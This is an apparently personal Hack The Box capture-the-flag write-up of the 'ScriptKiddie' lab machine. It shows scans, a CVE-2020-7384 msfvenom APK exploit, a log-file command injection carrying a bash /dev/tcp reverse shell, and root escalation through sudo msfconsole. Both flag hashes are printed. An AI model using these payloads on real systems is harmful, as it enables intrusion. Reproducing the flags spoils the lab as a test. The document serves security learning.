HTB ScriptKiddie done
ScriptKiddie¶
Notes¶
OS:¶
Linux
Technology:¶
Werkzeug httpd 0.16.1 (Python 3.8.5)
IP Address:¶
10.129.224.168
Open ports:¶
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
Users and pass:¶
Nmap¶
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_ScriptKiddie]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.224.168_nmap 10.129.224.168 ; cat 10.129.224.168_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-08 12:20 CEST
Nmap scan report for 10.129.224.168
Host is up (0.048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
Ffuz: http://10.129.224.168:5000¶
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_ScriptKiddie]
└─$ ffuf -u http://10.129.224.168:5000/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.224.168_5000_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.224.168:5000/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : 10.129.224.168_5000_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [163752/163752] :: Job [1/1] :: 297 req/sec :: Duration: [0:10:07] :: Errors: 0 ::
Exploit: CVE2020-7384 - Metasploit Framework 6.0.11 - msfvenom APK template command injection¶
CVE2020-7384 - Metasploit Framework 6.0.11 - msfvenom APK template command injection
Create revshell payload¶
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_ScriptKiddie/CVE-2020-7384]
└─$ ./CVE-2020-7384.sh
CVE-2020-7384
Enter a name for the exploit file (Press enter for default: shell):
Enter the LHOST (Press enter for default: 10.10.14.59):
Enter the LPORT (Press enter for default: 4444):
Select the payload type (press enter for default: bash):
1. bash
2. nc
3. python
4. python3
select: 1
APK created at: /home/kali/Desktop/writeups/HTB/HTB_ScriptKiddie/CVE-2020-7384/shell.apk
To use the exploit on the vulnerable machine, run:
msfvenom -x shell.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_ScriptKiddie/CVE-2020-7384]
Upload revshell¶
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_ScriptKiddie]
└─$ netcat -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.59] from (UNKNOWN) [10.129.225.48] 56674
bash: cannot set terminal process group (937): Inappropriate ioctl for device
bash: no job control in this shell
kid@scriptkiddie:~/html$
ikid@scriptkiddie:~/html$
kid@scriptkiddie:~/html$ id
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
kid@scriptkiddie:~/html$
Read flag: user.txt¶
kid@scriptkiddie:~/html$ find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/kid/user.txt
kid@scriptkiddie:~/html$
cakid@scriptkiddie:~/html$ t /home/kid/user.txt
cat /home/kid/user.txt
0658779559c0e3e75b39bd9692d7716e
kid@scriptkiddie:~/html$
Read file: /home/pwn/scanlosers.sh¶
We can make command injection because cut get three parametr from left side
---
kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
cat scanlosers.sh
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
Create revshell¶
kid@scriptkiddie:~/logs$ echo "x x x 127.0.0.1; bash -c 'bash -i >& /dev/tcp/10.10.14.59/5000 0>&1' # ." > hackers
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_ScriptKiddie]
└─$ netcat -lvnp 5000
listening on [any] 5000 ...
connect to [10.10.14.59] from (UNKNOWN) [10.129.225.48] 59932
bash: cannot set terminal process group (806): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$
sudo -l¶
pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwn may run the following commands on scriptkiddie:
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
Privilege Escalation:¶
GTFObins - msfconsole¶
pwn@scriptkiddie:~$ sudo msfconsole
sudo msfconsole
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|
=[ metasploit v6.0.9-dev ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Display the Framework log using the log command, learn more with help log
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > irb
stty: 'standard input': Inappropriate ioctl for device
[*] Starting IRB shell...
[*] You are in the "framework" object
system("bash")
Switch to inspect mode.
irb: warn: can't alias jobs from irb_jobs.
>> system("bash")
id
uid=0(root) gid=0(root) groups=0(root)
Read flag: root.txt¶
id
uid=0(root) gid=0(root) groups=0(root)
cd /root/
ls -a
.
..
.bash_history
.bashrc
.cache
.gem
.lesshst
.local
.msf4
.profile
.selected_editor
.viminfo
root.txt
snap
cat root.txt
41380278d6f60ccbfff7b4637e017ec9
References¶
[CVE2020-7384 - Metasploit Framework 6.0.11 - msfvenom APK template command injection](https://www.exploit-db.com/exploits/49491)
[CVE-2020-7384](https://github.com/CarsonShaffer/CVE-2020-7384)
Lessons Learned¶
Tags¶